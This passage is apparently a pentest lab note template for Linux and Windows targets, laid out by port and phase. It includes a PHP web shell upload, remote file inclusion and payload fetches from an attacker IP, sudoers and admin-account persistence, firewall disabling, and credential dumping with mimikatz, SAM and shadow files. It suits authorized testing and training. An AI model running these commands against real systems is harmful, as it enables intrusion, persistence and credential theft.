curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# Look at page with just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq
# Check if it is possible to upload
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```
#### Nikto scan
INSERTNIKTOSCAN
#### Url brute force
```
# Not recursive
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
# Gobuster - adjust the status codes to report (drop 403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```
INSERTDIRBSCAN
#### Default/Weak login
Search documentation for default passwords and test them
```
site:webapplication.com password
```
```
admin admin
admin password
admin <blank>
admin <servicename>
root root
root admin
root password
root <servicename>
<username if you have> password
<username if you have> admin
<username if you have> username
username <servicename>
```
#### LFI/RFI
```
fimap -u "http://INSERTIPADDRESS/example.php?test="
# Ordered output
curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
```
#### SQL-Injection
```
# Post
./sqlmap.py -r search-test.txt -p tfUPass
# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```
#### Sql-login-bypass
- Open Burp-suite
- Make and intercept a request
- Send to intruder
- Cluster attack.
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation
### Password brute force - last resort
```
# Build a wordlist from the site's own pages
cewl -w words.txt http://INSERTIPADDRESS
```
### Port 443 - HTTPS
Heartbleed:
```
# Heartbleed
sslscan INSERTIPADDRESS:443
```
## Vulnerability analysis
Now we have gathered information about the system. Next comes the part where we look for exploits, vulnerabilities and features.
### To try - List of possibilies
Add possible exploits here:
### Find sploits - Searchsploit and google
Where there are many exploits for a software, use google. It will automatically sort it by popularity.
```
site:exploit-db.com apache 2.4.7
# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```
----------------------------------------------------------------------------
'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
-----------------------------------------------------------------------------
## Privilege escalation
Now we start the whole enumeration process over again.
- Kernel exploits
- Programs running as root
- Installed software
- Weak/reused/plaintext passwords
- Inside service
- Suid misconfiguration
- World writable scripts invoked by root
- Unmounted filesystems
Less likely
- Private ssh keys
- Bad path configuration
- Cronjobs
### To-try list
Here you will add all possible leads. What to try.
### Useful commands
```
# Spawning shell
python -c 'import pty; pty.spawn("/bin/sh")'
# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# Set up webserver
cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
# Download all files
wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
./LinEnum.sh -t -k password -r LinEnum.txt
python linprivchecker.py extended
./unix-privesc-check standard
# Writable directories
/tmp
/var/tmp
# Add user to sudoers (persistence; you must already be root for this to work)
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
```
### Basic info
- OS:
- Version:
- Kernel version:
- Architecture:
- Current user:
**Devtools:**
- GCC:
- NC:
- WGET:
**Users with login:**
```
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
# Users with login
grep -vE "nologin" /etc/passwd
# Priv Enumeration Scripts
upload /unix-privesc-check
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
python linprivchecker.py extended
./LinEnum.sh -t -k password
unix-privesc-check
```
### Kernel exploits
```
site:exploit-db.com kernel version
perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
python linprivchecker.py extended
```
### Programs running as root
Look for webserver, mysql or anything else like that.
```
# Metasploit
ps
# Linux
ps aux
```
### Installed software
```
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/
# Debian
dpkg -l
# CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )
# OpenBSD, FreeBSD
pkg_info
```
### Weak/reused/plaintext passwords
- Check database config-file
- Check databases
- Check weak passwords
```
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
```
- Check plaintext
```
./LinEnum.sh -t -k password
```
### Inside service
```
# Linux
netstat -anlp
netstat -ano
```
### Suid misconfiguration
A SUID binary can be run by anyone, but it executes with the privileges of its owner. A root-owned SUID binary that can spawn a shell or read/write arbitrary files is therefore a direct path to root.
Example programs:
```
nmap
vim
nano
```
```
find / -perm -u=s -type f 2>/dev/null
```
### Unmounted filesystems
Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
```
mount -l
```
### Cronjob
Look for anything that is run by a privileged user but writable by you
```
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
```
### SSH Keys
Check all home directories
```
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
```
### Bad path configuration
Requires user interaction: a privileged user has to run a command that is resolved through a PATH entry you can write to.
------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT ----------------------
------------------------------------------------------------------------
## Loot
**Checklist**
- Proof:
- Network secret:
- Passwords and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
- Mail:
### Proof
```
/root/proof.txt
```
### Network secret
```
/root/network-secret.txt
```
### Passwords and hashes
```
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```
### Dualhomed
```
ifconfig
ifconfig -a
arp -a
```
### Tcpdump
```
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
```
### Interesting files
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
.ssh:
.bash_history
```
### Databases
### SSH-Keys
### Browser
### Mail
```
/var/mail
/var/spool/mail
```
### GUI
If there is a gui we want to check out the browser.
```
echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION
```
## How to replicate:
================================================
FILE: templates/windows-template.md
================================================
## Info-sheet
- DNS-Domain name:
- Host name:
- OS:
- Server:
- Workgroup:
- Windows domain:
- Services and ports:
INSERTTCPSCAN
## Recon
```
# Always start with a stealthy scan; an aggressive one can trip defences that close ports on you.
# Syn-scan
nmap -sS INSERTIPADDRESS
# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O
# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-
# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS
# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772
# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```
### Port 21 - FTP
- Name:
- Version:
- Anonymous login:
INSERTFTPTEST
```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```
### Port 22 - SSH
- Name:
- Version:
- Protocol:
- RSA-key-fingerprint:
- Takes-password:
If you have usernames test login with username:username
INSERTSSHCONNECT
### Port 25
- Name:
- Version:
- VRFY:
- EXPN:
INSERTSMTPCONNECT
```
nc -nvv INSERTIPADDRESS 25
HELO foo<cr><lf>
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```
### Port 110 - Pop3
- Name:
- Version:
INSERTPOP3CONNECT
### Port 135 - MSRPC
Some versions are vulnerable.
```
nmap INSERTIPADDRESS --script=msrpc-enum
```
Exploit:
```
msf > use exploit/windows/dcerpc/ms03_026_dcom
```
### Port 139/445 - SMB
- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:
```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445
enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
# Log in with a shell:
winexe -U username //INSERTIPADDRESS "cmd.exe" --system
```
### Port 161/162 UDP - SNMP
```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```
```
# Common community strings
public
private
community
```
### Port 554 - RTSP
### Port 1030/1032/1033/1038
Used by RPC to connect in domain network. Usually nothing.
### Port 1433 - MSSQL
- Version:
```
use auxiliary/scanner/mssql/mssql_ping
# Last resort: brute force.
use auxiliary/scanner/mssql/mssql_login
# Log in to mssql
sqsh -S INSERTIPADDRESS -U sa
# Execute commands
xp_cmdshell 'date'
go
```
If you have credentials look in metasploit for other modules.
### Port 1521 - Oracle
- Name:
- Version:
- Password protected:
```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```
### Port 2100 - Oracle XML DB
Can be accessed through ftp.
Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
- Name:
- Version:
Default logins:
```
sys:sys
scott:tiger
```
### Port 2049 - NFS
```
showmount -e INSERTIPADDRESS
# If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```
### Port 3306 - MySQL
- Name:
- Version:
```
mysql --host=INSERTIPADDRESS -u root -p
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
```
### Port 3339 - Oracle web interface
- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:
### Port 3389 - Remote desktop
Test logging in to see what OS is running
```
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```
### Port 80
- Server:
- Scripting language:
- Apache Modules:
- Domain-name address:
INSERTCURLHEADER
- Web application
- Name:
- Version:
```
# Nikto
nikto -h http://INSERTIPADDRESS
# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
# Get header
curl -i INSERTIPADDRESS
# Get everything
curl -i -L INSERTIPADDRESS
# Check if it is possible to upload using put
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
# Check for title and all links
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```
#### Nikto scan
INSERTNIKTOSCAN
#### Url brute force
```
# Dirb
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
# Gobuster - remove irrelevant response codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```
INSERTDIRBSCAN
#### Default/Weak login
Google documentation for default passwords and test them:
```
site:webapplication.com password
```
```
admin admin
admin password
admin <blank>
admin nameofservice
root root
root admin
root password
root nameofservice
<username if you have> password
<username if you have> admin
<username if you have> username
<username if you have> nameofservice
```
#### LFI/RFI
```
# Kadimus
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
# Bypass execution
http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d savefile.php
# Bypass extension
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?
```
#### SQL-Injection
```
# Post
./sqlmap.py -r search-test.txt -p tfUPass
# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```
#### Sql-login-bypass
- Open Burp-suite
- Make and intercept request
- Send to intruder
- Cluster attack
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation
### Password brute force - last resort
```
cewl
```
### Port 443 - HTTPS
Heartbleed:
```
sslscan INSERTIPADDRESS:443
```
## Vulnerability analysis
Now that we have gathered information about the system, the next step is to look for exploits, vulnerabilities and abusable features.
### To try - List of possibilities
Add possible exploits here:
### Find sploits - Searchsploit and google
When there are many exploits for a piece of software, use Google; it automatically sorts the results by popularity.
```
site:exploit-db.com apache 2.4.7
# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```
----------------------------------------------------------------------------
'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
-----------------------------------------------------------------------------
## Privilege escalation
Now we start the whole enumeration process over again. This is a checklist; you need to check off every single item, in this order.
- Kernel exploits
- Cleartext password
- Reconfigure service parameters
- Inside service
- Program running as root
- Installed software
- Scheduled tasks
- Weak passwords
### To-try list
Here you will add all possible leads. What to try.
### Basic info
- OS:
- Version:
- Architecture:
- Current user:
- Hotfixes:
- Antivirus:
**Users:**
**Localgroups:**
```
systeminfo
set
hostname
net users
net user user1
net localgroup
accesschk.exe -uwcqv "Authenticated Users" *
netsh firewall show state
netsh firewall show config
# Set path
set PATH=%PATH%;C:\xampp\php
```
### Kernel exploits
```
# Look for hotfixes
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Search for exploits
site:exploit-db.com windows XX XX
```
### Cleartext passwords
```
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
### Reconfigure service parameters
- Unquoted service paths
Check book for instructions
- Weak service permissions
Check book for instructions
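As an added audit example (not part of this template or of the course material it refers to), here is a Python script that finds Windows services whose binary path is unquoted and contains spaces, and produces the quoted form a defender would set. It assumes the CSV layout that `wmic service get name,pathname,startmode /format:csv` produces (Node,Name,PathName,StartMode); the service rows below are constructed sample data, not output from a real host.

```python
"""Audit Windows service binary paths for unquoted paths containing spaces.

Added example, not part of the original template. Assumes the CSV layout of
`wmic service get name,pathname,startmode /format:csv` (Node,Name,PathName,
StartMode); the rows below are constructed sample data.
"""
import re
from typing import List, Tuple

# Constructed sample in wmic's CSV layout (wmic emits a blank first line).
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,BackupAgent,C:\Program Files\Acme Backup\agent.exe -service,Auto
HOST1,MonitorAgent,"C:\Program Files\Acme Backup\monitor.exe" -service,Auto
HOST1,UpdaterSvc,C:\Program Files (x86)\Vendor Updater\updater.exe,Manual
HOST1,Tiny,C:\Tools\svc.exe,Auto
"""

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def split_executable(pathname: str) -> Tuple[str, str]:
    """Split a service PathName into (executable path, argument tail).

    The executable ends at the first '.exe' (case-insensitive); when there
    is none, the whole string is treated as the executable path.
    """
    m = EXE_RE.search(pathname)
    end = m.end() if m else len(pathname)
    return pathname[:end], pathname[end:]


def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the executable path is not quoted and contains a space."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    exe, _args = split_executable(p)
    return " " in exe


def quoted_pathname(pathname: str) -> str:
    """The remediated form: executable path wrapped in quotes, args untouched."""
    exe, args = split_executable(pathname.strip())
    return f'"{exe}"{args}'


def parse_wmic_csv(text: str) -> List[Tuple[str, str, str]]:
    """Return (name, pathname, startmode) rows.

    Deliberately avoids the csv module: wmic does not escape quotes inside
    PathName, and a csv reader would silently strip them, hiding the very
    thing this audit checks for.
    """
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue  # blank line and header
        _node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)
        rows.append((name, pathname, startmode))
    return rows


def audit_unquoted_services(text: str) -> List[Tuple[str, str, str]]:
    """(service name, current PathName, quoted PathName) for each finding."""
    return [
        (name, pathname, quoted_pathname(pathname))
        for name, pathname, _mode in parse_wmic_csv(text)
        if is_unquoted_with_spaces(pathname)
    ]


if __name__ == "__main__":
    for name, current, fixed in audit_unquoted_services(SAMPLE_WMIC_CSV):
        print(f"{name}: {current}\n    fix -> {fixed}")
```

On the sample this flags BackupAgent and UpdaterSvc and leaves the already quoted MonitorAgent alone. Whether a flagged service matters depends on the ACLs of every intermediate directory (C:\Program Files is not writable by standard users by default); the remediation is the quoted binary path either way, applied with `sc config <name> binPath=`.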
### Inside service
Check netstat to see which ports are open from the outside and from the inside. Look for ports that are only reachable from the inside.
```
# Meterpreter
run get_local_subnets
netstat /a
netstat -ano
```
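As an added example (not part of the original template), here is a Python helper that implements the comparison described above: it parses `netstat -ano` output for listening sockets, drops established connections, and lists the listeners the external scan did not report together with the interface they are bound to. The netstat output and the external port set below are constructed sample data.

```python
"""Listeners visible from the inside but not in the external scan.

Added example, not part of the original template. Both inputs below are
constructed sample data: a `netstat -ano` dump and the set of open ports an
external scan reported.
"""
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of `netstat -ano` output from a Windows host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1234
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       2212
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       3088
  TCP    192.168.1.50:3389      0.0.0.0:0              LISTENING       560
  TCP    192.168.1.50:49731     192.168.1.20:445       ESTABLISHED     4
  UDP    0.0.0.0:161            *:*                                    1844
"""

# Constructed: what an external nmap scan of the same host reported as open.
SAMPLE_EXTERNAL_OPEN = {"TCP/80", "TCP/445", "TCP/3389"}

# proto, local addr, local port, foreign addr, optional state, pid
NETSTAT_LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$"
)
ANY_ADDRS = {"0.0.0.0", "[::]"}
LOOPBACK_ADDRS = {"127.0.0.1", "[::1]"}


def parse_listeners(netstat_text: str) -> Dict[str, Set[str]]:
    """Map 'PROTO/port' -> set of local addresses it is bound on.

    TCP sockets count only in LISTENING state; UDP rows have no state
    column in netstat output, so every UDP row is a listener.
    """
    listeners: Dict[str, Set[str]] = {}
    for line in netstat_text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue  # header and blank lines
        proto, addr, port, _foreign, state, _pid = m.groups()
        if proto == "TCP" and state != "LISTENING":
            continue  # ESTABLISHED, TIME_WAIT, ... are not listeners
        listeners.setdefault(f"{proto}/{port}", set()).add(addr)
    return listeners


def bind_scope(addr: str) -> str:
    """Classify where a listener is reachable from, by its bind address."""
    if addr in ANY_ADDRS:
        return "all-interfaces"
    if addr in LOOPBACK_ADDRS:
        return "loopback-only"
    return "single-interface"


def internal_only(netstat_text: str, external_open: Set[str]) -> List[Tuple[str, str]]:
    """Listeners the host has that the external scan did not report.

    Returns (PROTO/port, bind scope) pairs sorted by protocol and port.
    """
    found = []
    for key, addrs in parse_listeners(netstat_text).items():
        if key in external_open:
            continue
        found.append((key, ",".join(sorted(bind_scope(a) for a in addrs))))
    found.sort(key=lambda kv: (kv[0].split("/")[0], int(kv[0].split("/")[1])))
    return found


if __name__ == "__main__":
    for key, where in internal_only(SAMPLE_NETSTAT, SAMPLE_EXTERNAL_OPEN):
        print(f"{key:10s} {where}")
```

In the sample, the two loopback-only database listeners are the inside-only services this step is after. UDP/161 is bound to all interfaces yet missing from the external results, which usually means the external scan skipped UDP or a firewall filters it; either way it belongs on the list to verify.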
### Programs running as root/system
### Installed software
```
# Metasploit
ps
tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY
# Look in:
# C:\Program files
# C:\Program files (x86)
# Home directory of the user
```
### Scheduled tasks
```
schtasks /query /fo LIST /v
# Check this file:
c:\WINDOWS\SchedLgU.Txt
```
### Weak passwords
Remote desktop
```
ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```
### Useful commands
**Add user and enable RDP**
```
net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Turn the firewall off
netsh firewall set opmode disable
# If you get this error:
#   "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
#   Failed to connect, CredSSP required by server."
# add this reg key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```
------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT -------------------
------------------------------------------------------------------------
## Loot
- Proof:
- Network secret:
- Password and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
### Proof
### Network secret
### Passwords and hashes
```
wce32.exe -w
wce64.exe -w
fgdump.exe
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system
# Meterpreter
hashdump
load mimikatz
msv
```
### Dualhomed
```
ipconfig /all
route print
# What other machines have been connected
arp -a
```
### Tcpdump
```
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
```
### Interesting files
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
# Recursive search
dir /s
```
### Mail
### Browser
- Browser start-page:
- Browser-history:
- Saved passwords:
### Databases
### SSH-keys
## How to replicate: